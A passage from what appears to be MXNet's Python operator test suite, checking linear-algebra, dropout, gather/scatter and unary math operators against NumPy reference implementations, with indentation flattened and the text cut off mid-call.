ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as these tests need CUDA 8
# and the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
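# Documentation only: with T = dot(grad_u, u.T), the reference above returns
#   grad_a = u.T @ (diag(grad_l) + S) @ u,
# where S is symmetric with zero diagonal and off-diagonal entries
#   S[i, j] = (T[i, j] - T[j, i]) / (2 * (l[i] - l[j])),
# i.e. the standard adjoint of the symmetric eigendecomposition with eigenvectors
# stored as rows of u (matching _syevd_forward).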
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs CUDA 8
# and the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs CUDA 8
# and the MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test triangle extraction by doing a full round trip, since the intermediate extracted
# triangle uses a different ordering than NumPy
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@unittest.skip("Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: the test fails intermittently when cuDNN is on; cuDNN is temporarily disabled until this gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure the input contains no zeros (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# The relative error should hopefully be within ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
@with_seed()
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
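# Cross-check in plain NumPy (illustration only, helper not used by the tests):
# fancy indexing wraps negative indices the same way the bound check above
# expects gather_nd to do.
def _np_gather_nd_wrap_check():
    a = np.array([[0, 1, 2], [3, 4, 5]])
    assert (a[[0, 1, -1], [0, 1, -2]] == a[[0, 1, 1], [0, 1, 1]]).all()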
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
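# Rationale note (documentation only): check_numeric_gradient approximates each
# partial derivative with a finite-difference quotient of step numeric_eps (the
# exact differencing scheme is an implementation detail of the test utility),
# which is why these checks are pinned to float64 and use relatively loose tolerances.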
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
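# Tiny spot check for the reference implementation above (illustration only,
# sigma = 1): smooth_l1 is quadratic for |x| < 1/sigma^2 and linear outside.
def _np_smooth_l1_spot_check():
    assert np.isclose(np_smooth_l1(np.array([0.5]), 1.), 0.125).all()       # 0.5 * 0.5**2
    assert np.isclose(np_smooth_l1(np.array([2.0]), 1.), 1.5).all()         # 2.0 - 0.5
    assert np.isclose(np_smooth_l1_grad(np.array([0.5]), 1.), 0.5).all()    # x * sigma**2
    assert np.isclose(np_smooth_l1_grad(np.array([2.0]), 1.), 1.0).all()    # sign(x)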
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtypes
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
